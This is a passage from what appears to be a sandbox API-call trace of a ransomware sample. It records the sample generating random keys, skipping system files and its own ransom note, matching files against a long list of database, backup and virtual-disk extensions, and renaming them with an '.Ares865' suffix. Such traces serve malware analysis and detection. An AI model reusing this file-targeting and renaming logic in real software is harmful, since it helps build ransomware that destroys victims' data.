Size=0x80) returned 0x2f00d8 [0089.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.255] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.255] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.256] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe300, lpName=0x0) returned 0x15c [0089.257] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe300) returned 0x190000 [0089.261] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.261] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.261] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.261] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.261] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.262] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.262] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.262] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.263] CloseHandle (hObject=0x15c) returned 1 [0089.263] CloseHandle (hObject=0x118) returned 1 [0089.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.263] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="aoldtz.exe") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2=".") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="..") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="windows") returned -1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="bootmgr") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="temp") returned -1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="pagefile.sys") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="boot") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="ids.txt") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="ntuser.dat") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="perflogs") returned 1 [0089.263] lstrcmpiW (lpString1="scan_.ico", lpString2="MSBuild") returned 1 [0089.263] lstrlenW (lpString="scan_.ico") returned 9 [0089.263] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0089.264] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="scan_.ico" | out: lpString1="scan_.ico") returned="scan_.ico" [0089.264] lstrlenW (lpString="scan_.ico") returned 9 [0089.264] lstrlenW (lpString="Ares865") returned 7 [0089.264] lstrcmpiW (lpString1="an_.ico", lpString2="Ares865") returned -1 [0089.264] lstrlenW (lpString=".dll") returned 4 [0089.264] lstrcmpiW (lpString1="scan_.ico", lpString2=".dll") returned 1 [0089.264] lstrlenW (lpString=".lnk") returned 4 [0089.264] lstrcmpiW (lpString1="scan_.ico", lpString2=".lnk") returned 1 [0089.264] lstrlenW (lpString=".ini") returned 4 [0089.264] lstrcmpiW (lpString1="scan_.ico", lpString2=".ini") returned 1 [0089.264] lstrlenW (lpString=".sys") returned 4 [0089.264] lstrcmpiW (lpString1="scan_.ico", lpString2=".sys") returned 1 [0089.264] lstrlenW (lpString="scan_.ico") returned 9 [0089.264] lstrlenW (lpString="bak") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.264] lstrlenW (lpString="ba_") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.264] lstrlenW (lpString="dbb") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.264] lstrlenW (lpString="vmdk") returned 4 [0089.264] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.264] lstrlenW (lpString="rar") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.264] lstrlenW (lpString="zip") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.264] lstrlenW (lpString="tgz") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.264] lstrlenW (lpString="vbox") returned 4 [0089.264] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.264] lstrlenW (lpString="vdi") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.264] lstrlenW (lpString="vhd") returned 3 [0089.264] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.264] lstrlenW (lpString="vhdx") returned 4 [0089.264] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.264] lstrlenW (lpString="avhd") returned 4 [0089.264] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.264] lstrlenW (lpString="db") returned 2 [0089.264] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.265] lstrlenW (lpString="db2") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.265] lstrlenW (lpString="db3") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.265] lstrlenW (lpString="dbf") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.265] lstrlenW (lpString="mdf") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.265] lstrlenW (lpString="mdb") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.265] lstrlenW (lpString="sql") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.265] lstrlenW (lpString="sqlite") returned 6 [0089.265] lstrcmpiW (lpString1="n_.ico", lpString2="sqlite") returned -1 [0089.265] lstrlenW (lpString="sqlite3") returned 7 [0089.265] lstrcmpiW (lpString1="an_.ico", lpString2="sqlite3") returned -1 [0089.265] lstrlenW (lpString="sqlitedb") returned 8 [0089.265] lstrcmpiW (lpString1="can_.ico", lpString2="sqlitedb") returned -1 [0089.265] lstrlenW (lpString="xml") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.265] lstrlenW (lpString="$er") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.265] lstrlenW (lpString="4dd") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.265] lstrlenW (lpString="4dl") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.265] lstrlenW (lpString="^^^") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.265] lstrlenW (lpString="abs") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.265] lstrlenW (lpString="abx") returned 3 [0089.265] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.265] lstrlenW (lpString="accdb") returned 5 [0089.265] lstrcmpiW (lpString1="_.ico", lpString2="accdb") returned -1 [0089.265] lstrlenW (lpString="accdc") returned 5 [0089.265] lstrcmpiW (lpString1="_.ico", lpString2="accdc") returned -1 [0089.265] lstrlenW (lpString="accde") returned 5 [0089.265] lstrcmpiW (lpString1="_.ico", lpString2="accde") returned -1 [0089.265] lstrlenW (lpString="accdr") returned 5 [0089.266] lstrcmpiW (lpString1="_.ico", lpString2="accdr") returned -1 [0089.266] lstrlenW (lpString="accdt") returned 5 [0089.266] lstrcmpiW (lpString1="_.ico", lpString2="accdt") returned -1 [0089.266] lstrlenW (lpString="accdw") returned 5 [0089.266] lstrcmpiW (lpString1="_.ico", lpString2="accdw") returned -1 [0089.266] lstrlenW (lpString="accft") returned 5 [0089.266] lstrcmpiW (lpString1="_.ico", lpString2="accft") returned -1 [0089.266] lstrlenW (lpString="adb") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.266] lstrlenW (lpString="adb") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.266] lstrlenW (lpString="ade") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.266] lstrlenW (lpString="adf") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.266] lstrlenW (lpString="adn") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.266] lstrlenW (lpString="adp") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.266] lstrlenW (lpString="alf") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.266] lstrlenW (lpString="ask") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.266] lstrlenW (lpString="btr") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.266] lstrlenW (lpString="cat") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.266] lstrlenW (lpString="cdb") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.266] lstrlenW (lpString="ckp") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.266] lstrlenW (lpString="cma") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.266] lstrlenW (lpString="cpd") returned 3 [0089.266] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.266] lstrlenW (lpString="dacpac") returned 6 [0089.266] lstrcmpiW (lpString1="n_.ico", lpString2="dacpac") returned 1 [0089.267] lstrlenW (lpString="dad") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.267] lstrlenW (lpString="dadiagrams") returned 10 [0089.267] lstrlenW (lpString="daschema") returned 8 [0089.267] lstrcmpiW (lpString1="can_.ico", lpString2="daschema") returned -1 [0089.267] lstrlenW (lpString="db-journal") returned 10 [0089.267] lstrlenW (lpString="db-shm") returned 6 [0089.267] lstrcmpiW (lpString1="n_.ico", lpString2="db-shm") returned 1 [0089.267] lstrlenW (lpString="db-wal") returned 6 [0089.267] lstrcmpiW (lpString1="n_.ico", lpString2="db-wal") returned 1 [0089.267] lstrlenW (lpString="dbc") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.267] lstrlenW (lpString="dbs") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.267] lstrlenW (lpString="dbt") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.267] lstrlenW (lpString="dbv") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.267] lstrlenW (lpString="dbx") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.267] lstrlenW (lpString="dcb") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.267] lstrlenW (lpString="dct") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.267] lstrlenW (lpString="dcx") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.267] lstrlenW (lpString="ddl") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.267] lstrlenW (lpString="dlis") returned 4 [0089.267] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.267] lstrlenW (lpString="dp1") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.267] lstrlenW (lpString="dqy") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.267] lstrlenW (lpString="dsk") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.267] lstrlenW (lpString="dsn") returned 3 [0089.267] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.267] lstrlenW (lpString="dtsx") returned 4 [0089.268] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.268] lstrlenW (lpString="dxl") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.268] lstrlenW (lpString="eco") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.268] lstrlenW (lpString="ecx") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.268] lstrlenW (lpString="edb") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.268] lstrlenW (lpString="epim") returned 4 [0089.268] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.268] lstrlenW (lpString="fcd") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.268] lstrlenW (lpString="fdb") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.268] lstrlenW (lpString="fic") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.268] lstrlenW (lpString="flexolibrary") returned 12 [0089.268] lstrlenW (lpString="fm5") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.268] lstrlenW (lpString="fmp") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.268] lstrlenW (lpString="fmp12") returned 5 [0089.268] lstrcmpiW (lpString1="_.ico", lpString2="fmp12") returned -1 [0089.268] lstrlenW (lpString="fmpsl") returned 5 [0089.268] lstrcmpiW (lpString1="_.ico", lpString2="fmpsl") returned -1 [0089.268] lstrlenW (lpString="fol") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.268] lstrlenW (lpString="fp3") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.268] lstrlenW (lpString="fp4") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.268] lstrlenW (lpString="fp5") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.268] lstrlenW (lpString="fp7") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.268] lstrlenW (lpString="fpt") returned 3 [0089.268] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.268] lstrlenW (lpString="frm") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.269] lstrlenW (lpString="gdb") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.269] lstrlenW (lpString="gdb") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.269] lstrlenW (lpString="grdb") returned 4 [0089.269] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.269] lstrlenW (lpString="gwi") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.269] lstrlenW (lpString="hdb") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.269] lstrlenW (lpString="his") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.269] lstrlenW (lpString="ib") returned 2 [0089.269] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.269] lstrlenW (lpString="idb") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.269] lstrlenW (lpString="ihx") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.269] lstrlenW (lpString="itdb") returned 4 [0089.269] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.269] lstrlenW (lpString="itw") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.269] lstrlenW (lpString="jet") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.269] lstrlenW (lpString="jtx") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.269] lstrlenW (lpString="kdb") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.269] lstrlenW (lpString="kexi") returned 4 [0089.269] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.269] lstrlenW (lpString="kexic") returned 5 [0089.269] lstrcmpiW (lpString1="_.ico", lpString2="kexic") returned -1 [0089.269] lstrlenW (lpString="kexis") returned 5 [0089.269] lstrcmpiW (lpString1="_.ico", lpString2="kexis") returned -1 [0089.269] lstrlenW (lpString="lgc") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.269] lstrlenW (lpString="lwx") returned 3 [0089.269] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.270] lstrlenW (lpString="maf") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.270] lstrlenW (lpString="maq") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.270] lstrlenW (lpString="mar") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.270] lstrlenW (lpString="marshal") returned 7 [0089.270] lstrcmpiW (lpString1="an_.ico", lpString2="marshal") returned -1 [0089.270] lstrlenW (lpString="mas") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.270] lstrlenW (lpString="mav") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.270] lstrlenW (lpString="maw") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.270] lstrlenW (lpString="mdbhtml") returned 7 [0089.270] lstrcmpiW (lpString1="an_.ico", lpString2="mdbhtml") returned -1 [0089.270] lstrlenW (lpString="mdn") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.270] lstrlenW (lpString="mdt") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.270] lstrlenW (lpString="mfd") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.270] lstrlenW (lpString="mpd") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.270] lstrlenW (lpString="mrg") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.270] lstrlenW (lpString="mud") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.270] lstrlenW (lpString="mwb") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.270] lstrlenW (lpString="myd") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.270] lstrlenW (lpString="ndf") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.270] lstrlenW (lpString="nnt") returned 3 [0089.270] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.270] lstrlenW (lpString="nrmlib") returned 6 [0089.270] lstrcmpiW (lpString1="n_.ico", lpString2="nrmlib") returned -1 [0089.270] lstrlenW (lpString="ns2") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.271] lstrlenW (lpString="ns3") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.271] lstrlenW (lpString="ns4") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.271] lstrlenW (lpString="nsf") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.271] lstrlenW (lpString="nv") returned 2 [0089.271] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.271] lstrlenW (lpString="nv2") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.271] lstrlenW (lpString="nwdb") returned 4 [0089.271] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.271] lstrlenW (lpString="nyf") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.271] lstrlenW (lpString="odb") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.271] lstrlenW (lpString="odb") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.271] lstrlenW (lpString="oqy") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.271] lstrlenW (lpString="ora") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.271] lstrlenW (lpString="orx") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.271] lstrlenW (lpString="owc") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.271] lstrlenW (lpString="p96") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.271] lstrlenW (lpString="p97") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.271] lstrlenW (lpString="pan") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.271] lstrlenW (lpString="pdb") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.271] lstrlenW (lpString="pdm") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.271] lstrlenW (lpString="pnz") returned 3 [0089.271] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.272] lstrlenW (lpString="qry") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.272] lstrlenW (lpString="qvd") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.272] lstrlenW (lpString="rbf") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.272] lstrlenW (lpString="rctd") returned 4 [0089.272] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.272] lstrlenW (lpString="rod") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.272] lstrlenW (lpString="rodx") returned 4 [0089.272] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.272] lstrlenW (lpString="rpd") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.272] lstrlenW (lpString="rsd") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.272] lstrlenW (lpString="sas7bdat") returned 8 [0089.272] lstrcmpiW (lpString1="can_.ico", lpString2="sas7bdat") returned -1 [0089.272] lstrlenW (lpString="sbf") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.272] lstrlenW (lpString="scx") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.272] lstrlenW (lpString="sdb") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.272] lstrlenW (lpString="sdc") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.272] lstrlenW (lpString="sdf") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.272] lstrlenW (lpString="sis") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.272] lstrlenW (lpString="spq") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.272] lstrlenW (lpString="te") returned 2 [0089.272] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.272] lstrlenW (lpString="teacher") returned 7 [0089.272] lstrcmpiW (lpString1="an_.ico", lpString2="teacher") returned -1 [0089.272] lstrlenW (lpString="tmd") returned 3 [0089.272] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.273] lstrlenW (lpString="tps") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.273] lstrlenW (lpString="trc") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.273] lstrlenW (lpString="trc") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.273] lstrlenW (lpString="trm") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.273] lstrlenW (lpString="udb") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.273] lstrlenW (lpString="udl") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.273] lstrlenW (lpString="usr") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.273] lstrlenW (lpString="v12") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.273] lstrlenW (lpString="vis") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.273] lstrlenW (lpString="vpd") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.273] lstrlenW (lpString="vvv") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.273] lstrlenW (lpString="wdb") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.273] lstrlenW (lpString="wmdb") returned 4 [0089.273] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.273] lstrlenW (lpString="wrk") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.273] lstrlenW (lpString="xdb") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.273] lstrlenW (lpString="xld") returned 3 [0089.273] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.273] lstrlenW (lpString="xmlff") returned 5 [0089.274] lstrcmpiW (lpString1="_.ico", lpString2="xmlff") returned -1 [0089.274] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.Ares865") returned 103 [0089.274] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico.Ares865" 